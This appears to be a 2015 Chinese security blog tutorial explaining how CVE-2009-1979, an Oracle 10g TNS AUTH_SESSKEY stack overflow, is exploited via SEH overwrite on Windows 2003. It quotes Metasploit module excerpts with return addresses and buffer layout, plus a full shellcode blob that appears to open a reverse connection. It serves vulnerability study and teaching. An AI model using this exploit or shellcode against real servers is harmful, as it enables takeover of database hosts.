OracleTNS漏洞攻占oracle所在操作系统，进而入侵oracle

浏览数：24 / 时间：2015年06月12日

背景

随着数据库入侵手段的发展，对数据库的攻击已经不仅仅是针对数据库本身，而是扩展到数据库的各种组建（甚至中间件中）。

TNS（Transparance Network Substrate）作为ORACLE的核心组件之一，主要负责选择oracle协议配置器，确定一种客户端和服务器都支持的传输协议进行传输。TNS不仅定义了数据库和客户端之间的通讯协议，更负责对客户端进行身份验证（确认客户端所用用户名和密码是否合法）。简单说如果TNS有可利用漏洞则可能直接对Oracle造成入侵。利用TNS入侵oracle基本有3种方式：1.通过劫持TNS信息，把oracle的登录信息劫持到攻击者机器，获取敏感信息，甚至获取oracle管理员账号密码。具体请参考安华金和数据库安全实验室发表的《Oracle数据库漏洞隐患无需user/password快速入侵》一文。2.直接对在TNS中加密的oracle登录密钥进行破解具体请参考安华金和数据库安全实验室发表《见招拆招，破解oracle密码》一文。3.通过缓冲区溢出的方式，在oracle调用异常的TNS参数的时候获取oracle本地操作系统的控制权限。

本文将具体介绍方式3，通过TNS上的缓冲区漏洞入侵oracle所在操作系统。所用例子为CVE-2009-1979。借鉴该漏洞原作者的攻击代码，用metasploit做攻击工具，对一台win2003sp1上的oracle10g2.0.1.0进行攻击。

漏洞说明

CVE-2009-1979(原作者代码http://www.securityfocus.com/archive/1/507598)这个漏洞简单说就是：客户端和服务器确定要使用的验证机制后。进行O3logon验证（该协议是为了客户端向数据库证明客户端拥有合法密钥）每次登录数据库的时候都会走o3logon协议。在这个协议中客户端在获取数据库发来的AUTH_SEKEEY后，会向数据库发送一个对应的AUTH_SEKEEY和AUTH_PASSWORD。oracle10g1.0.5到10.2.04这些版本中客户端发送的AUTH_SEKEEY由于没有对内容的长度进行合理限制。导致成为一个缓冲区溢出的注入点。一个正常的AUTH_SEKEEY长度是64位（如下图所示）。而如果AUTH_SEKEEY长度超过64位则可能修改AUTH_SEKEEY附近的内存变量。导致出现不可预计的结果。

光知道AUTH_SEKEEY存在一个注入点是不够的，还需要进一步了解AUTH_SEKEEY是以什么方式存储在内存中的才可能有针对性的利用这个注入点。由于AUTH_SEKEEY是TNS接收的一个参数所以AUTH_SEKEEY在内存中的存储方式和TNS对消息的存储方式密切相关。客户端发送信息包到达服务器端经历了多个软件层。为了便于理解我们把这个过程做一个简化。从客户端开始信息被传递到客户端本地TNS，客户端本地TNS格式化这个信息，并将它发送给操作系统协议栈。操作系统协议栈通过网络将这个信息传递给服务器的协议栈：接着这个消息被传递给TNS，最终oracle调用TNS中传过来的信息。这个过程可以粗略的看成是在系统栈中进行的。所以可以基本认为CVE-2009-1979是一个缓冲区栈溢出漏洞。利用AUTH_SEKEEY值长度异常进行的栈缓冲区溢出攻击。关于缓冲区栈溢出原理可以参考安华金和数据库安全实验室发表的《windows缓冲区溢出原理(栈)》一文。

代码详解

为了更细致说明这个漏洞的具体机制，直接参考metasploit上关于该漏洞的代码。代码主体结构为：

require ‘msf/core‘

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::TNS

include Msf::Exploit::Remote::Seh

def initialize(info = {})

def check

def exploit

...........

end

其中核心函数只有initialize() 和exploit 两个。initialize主要是用来对漏洞利用的说明。exploit用来真正进行缓冲区溢出攻击。置于其他函数不属于关键函数，所以本文不介绍。

initialize的核心代码为：

‘DefaultOptions‘ =>

{

‘EXITFUNC‘ => ‘seh‘,

‘Payload‘ =>

{

‘Space‘ => 0x17e,

‘BadChars‘ => "", # none, thx memcpy!

‘StackAdjustment‘ => -3500,

‘Platform‘ => ‘win‘,

‘Targets‘ =>

[

[ ‘Automatic‘, { } ],

[ ‘Oracle 10.2.0.1.0 Enterprise Edition‘,

{

# Untested

‘Ret‘ => 0x011b0528 # p/p/r in oracle.exe v10.2.0.3

}

[ ‘Oracle 10.2.0.4.0 Enterprise Edition‘,

{

# Tested OK - 2010-Jan-20 - jduck

‘Ret‘ => 0x01347468 # p/p/r in oracle.exe v10.2.0.3

}

]

‘DefaultTarget‘ => 0,

‘DisclosureDate‘ => ‘Oct 20 2009‘))

initialize函数说明该漏洞被利用的条件（图中标红的地方为关键重点）该漏洞被描述为利用缓冲区栈溢出的SEH方式。这里的payload指的单纯是shellcode，而不是整个向注入点中注入的字符串（本文中就是组成AUTH_SESSKEY的值）。其中特别指出了整个栈中可被shellcode覆盖的空间限制为382个字节。badchars是限制用于填充空指令的限制字符。在win2003上对填充字符没有限制（有限制是为了防止填充字符对shellcode造成破坏，每种指令集的填充字符不同。）platform说明需要操作系统为WIN系列。这是因为不同的操作系统栈的结构、对栈缓冲区溢出的保护程度都是不同的（即便同样的操作系统不同的补丁下API基地址也有变化这回对缓冲区攻击造成很大影响）targets是指的可用于攻击的数据库版本号和SEH方法最关键的POP/POP/RET地址。本例中采用的是orcale10.2.0.1.0所以POP/POP/RET地址为0x011b0528。initialize最关键的3个点是：1.指出了shellcode的最大长度。2.指出了对应版本oracle用于SEH的POP/POP/RET地址。3对缓冲区溢出填充字符做了限制，防止sploit 被填充字符破坏。

exploit函数核心代码：

#伪造客户端给数据库发送的前6个包

# build exploit buffer

print_status("Calling kpoauth with long AUTH_SESSKEY ...")

sploit = payload.encoded 1

sploit << rand_text_alphanumeric(0x1aa - 0x17e) 2

sploit << generate_seh_record(mytarget.ret) 3

distance = payload_space + 0x2D

sploit<<Metasm::Shellcode.assemble(Metasm::Ia32.new,"jmp$-"+ 4

distance.to_s).encode_string

expliot函数主要负责2个任务：

1.伪造oracle客户端给真实的数据库发送包，直至发送到含有AUTH_SESSKEY字符串的数据包为止。下图就是伪造的数据包，exploit伪造的就是IP为10.10.10.128的客户端。10.10.10.130就是要入侵的目标数据库。

2.创建缓冲区溢出的sploit （build exploit buffer开始的内容）,首先给出制造的缓冲区溢出的整体结构： shellcode脚本+随机地址+短跳板+返回地址+长跳板。下面逐行说明：

第一行:sploit = payload.encoded

存入shellcode。这个shellcode的功能是直接获取被攻击机器的操作系统权限。代码如下：

"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B"

"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0"

"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57"

"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01"

"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B"

"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4"

"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B"

"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24"

"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D"

"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07"

"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00"

"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF"

"\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6"

"\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF"

"\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56"

"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00"

"\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56"

"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75"

"\xEC\xC3"

shellcode简单说就是一段为缓冲区溢出攻击而植入进程的代码，大多数是用汇编语言编写的。shellcode本身根据跳入的方式不同分为jump/call、pop return、push return、jmp[reg+offset]、blind return、SEH等多种类型。由于本文重点不在讨论shellcode。所以此处略过，以后会补上shellcode专门介绍的文章。本文的shellcode用的是SEH这种方式。

第二行:sploit << rand_text_alphanumeric(0x1aa - 0x17e)

生成填满目标地址到源地址之间的随机数。用随机数而不用固定的一串字符，最主要的原因是防止程序被某些防护机制处理而导致实验失败。TNS收到数据后会在oracommon10.dll中的函数kpzgkvl中进行检查。检查后用数据intel_fast_memcpy（这个函数是编译的时候intel对指令对memcpy进行了优化，而产生的代替memcpy的函数）拷贝给oracle处理。同样AUTH_SESSKEY的值也会走这个过程。溢出点就出现在这个拷贝函数中。拷贝的源地址是04AB99A4、目标地址是0x0673dB96(本文出现的所有地址只是作者的win2003sp1上的地址，打上不同补丁的操作系统地址会有变化)，而最近的SEH地址为0X0673DD40。地址04AB99A4中存储的AUTH_SESSKEY值通过intel_fast_memcpy拷贝到地址0x0673dB96。对04AB99A4中存储的AUTH_SESSKEY值没有长度判断导致，在拷贝到0x0673dB96后覆盖到0X0673DD40（SEH地址）发生缓冲区溢出。如果想要AUTH_SESSKEY的值从地址0x0673dB96一直覆盖到地址0X0673DD40，则需要考入426（0x1aa）个字符。只有在04AB99A4这个点输入426长度的字符串才有可能。这个漏洞的initialize中指出shellcode空间为382(0x17e)。不满足覆盖需求所以需要用（0x1aa - 0x17e）个字符来填充保证能覆盖到SEH（0X0673DD40）。为了更清楚说明为什么要覆盖到0X0673DD40，下面说明和本例相关的SEH中的一小部分。

SEH是windows的异常出处理机制。任何程序的异常处理本质上都是安装了SEH。一个线程中允许存在多个SEH。如果一个线程中没有做任何异常处理。windows也会在创建线程的开始通过系统函数来创建一个系统级SEH（当所有的SEH都无法处理异常的时候，最终会调用系统函数处理异常。结果就是弹出一个对话框，并强制关闭程序）。

在一个栈中每个SEH大小为8字节，有2个4字节成员组成，低地址位存储的是指向下一个SEH链表的指针，高地址位存储的是异常处理函数地址。当异常发生时会从TEB（线程环境块）中读取指向SEH链的指针，开始从异常触发地方由近及远逐个访问SEH，如果距离异常触发地方最近的SEH能处理该异常，则由该SEH处理。如果无法处理则沿着SEH链跳向下一个SEH。以此类推直到异常处理。最后一个SEH链的底部是FFFFFFFF。最后一个SEH就是线程开始系统创建的SEH。

缓冲区溢出SEH方式就是利用字符串覆盖掉SEH链中距离，异常触发点最近的SEH。把SEH handle（0x0673DD44）地址覆盖成pop/pop/ret类型（0x11b0528）。欺骗SEH handle执行pop/pop/ret，过程红会把pointer to next SEH rerord的地址放入EIP中最终ret会跳出到pointer to next SEH rerord中。具体过程为：当异常触发的时候，异常会自动自己创建一个栈帧。它会把SEH handle成员压入新创建的栈帧中。在SEH结构中有一个域是EstablisherFrame。这个域指向异常管理注册记录，pointer to next SEH rerord的地址被压入栈中，被压入的这个值位于ESP+8的位置。pop/pop/ret串覆盖SEH handle 后第一次pop 弹出栈顶的4bytes，接下来pop继续从栈中弹出4bytes。最后ret将把此时ESP所指栈顶中的值(pointer to next SEH rerord)放到EIP中。所以被pop/pop/ret覆盖的SEH handle会跳转回pointer to next SEH rerord。

由于pointer to next SEH rerord被改写成EB 06 +2个随机字符（凑成一行）则会跳过下面被改写的SEH handle。执行SEH handle后面的内容。如果后面的内容是shellcode或者是指向shellcoded的跳转指针，则跳入shellcode开始执行shellcode。

第三行. sploit << generate_seh_record(mytarget.ret)

通过函数generate_seh_record生成2行覆盖pointer to next SEH rerord的短跳板（包含EB 06、两个随机字符（凑成4字节））和覆盖SEH handle的返回地址（pop/pop/ret类型的0x11b0528）来完成覆盖SEH跳转到shellcode或下一个跳板的过程。

第四行

sploit<<Metasm::Shellcode.assemble(Metasm::Ia32.new,"jmp$-"+distance.to_s).encode_string

这句是一个长跳板。jmp$-表明是负跳转（由内存低地址跳回内存高地址）设置长跳板位于从pointer to next SEH rerord跳过SEH hande 后，执行长跳板跳回sploit的起始地址，开始执行shellcode。

整个sploit 的结构是 shellcode+随机填充值+短跳板+pop/pop/ret地址+长跳板（跳回最开始的）shellcode。最后把这个值赋给AUTH_SESSKEY，给数据库发送含有AUTH_SESSKEY的包。至此入侵完毕，为了效果更直观，在入侵机上运行脚本打开远程连接直接用 sqlplus / as sysdba 登录被入侵机数据库完成整个攻击。效果如下图所示：